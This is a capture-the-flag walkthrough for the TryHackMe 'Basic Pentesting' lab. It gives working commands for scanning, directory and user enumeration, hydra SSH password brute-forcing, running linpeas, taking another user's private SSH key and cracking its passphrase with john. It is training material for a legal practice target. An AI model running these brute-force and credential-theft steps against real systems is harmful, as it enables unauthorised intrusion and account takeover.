Basic Pentesting

This is a machine that allows you to practice web app hacking and privilege escalation

Previousrecon_26 (JS)NextEasyPeasy

Last updated 3 months ago

Try this challenge in TryHackMe: Basic Pentesting

In doing this challenge, I learned the following skills and tools:
brute forcing - using hydra
hash cracking - using ssh2john, john
service enumeration - using nmap, gobuster
Linux Enumeration - using enum4linux, linpeas

Web App Testing and Privilege Escalation

Find the services exposed by the machine

Run nmap and save it in basicpentest directory

mkdir basicpentest
nmap -sC -sV 10.10.X.X -oN basicpentest/initial

Just change the 10.10.X.X to the IP address assigned to your target machine

Check it in the browser: http://10.10.X.X

Try to View Page Source. There is a note in green there to check their dev note section.

So let's check if there is a /dev directory.

We get Not Found responses from both paths, but we can see information disclosure in the responses that are worth noting.

Apache/2.4.18 (Ubuntu) Server at 10.10.X.X Port 80

What is the name of the hidden directory on the web server (enter name without /)?

Using gobuster let's try to figure out what directories are available to the server.

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.X.X

Even without finishing the scan, we get the directory /development.

When we access the directory, we'll see two text files, dev.txt and j.txt. Let's open both.

User brute-forcing to find the username & password

We found users jan & kay via enum4linux

/usr/bin/enum4linux -a 10.10.X.X | tee enum4linux.lo

Using hydra, we now know the password

hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.10.X.X

Now that we know jan’s credentials, we used them to log in via SSH

Check folders and see if we can find interesting files

Since most actions led to denied permissions, we ran linpeas in the machine to check possible privilege escalation methods.

To copy linpeas.sh to the machine in the /dev/shm folder:

scp linpeas.sh [email protected]:/tmp

Check if the linpeas file is transferred successfully

Make linpeas executable:

chmod +x linpeas.sh

Then execute linpeas:

./linpeas.sh

From the linpeas results, we found private SSH keys in the path /home/kay/.ssh/id_rsa

Open the id_rsa file then copy the contents

cat id_rsa

In your Kali machine, paste the contents into a file named kay_id_rsa

nano kay_id_rsa

Change the permissions of the file to read-writable only by you

chmod 600 kay_id_rsa

Try logging in to the machine using the user Kay’s id_rsa

ssh -i kay_id_rsa [email protected]

We find that a passphrase is needed for this file.

To figure out the passphrase for kay’s id_rsa, we used ssh2john in the JohnTheRIpper module

ssh2john ~/kay_id_rsa

We need to save this in a text file to be decrypted via john

ssh2john ~/kay_id_rsa > ~/kay_id_rsa_john.txt

Using john, we decrypted the file and got the passphrase

We can now log in using kay’s credentials

ssh -i kay_id_rsa [email protected]

We opened the pass.bak file and then the password was revealed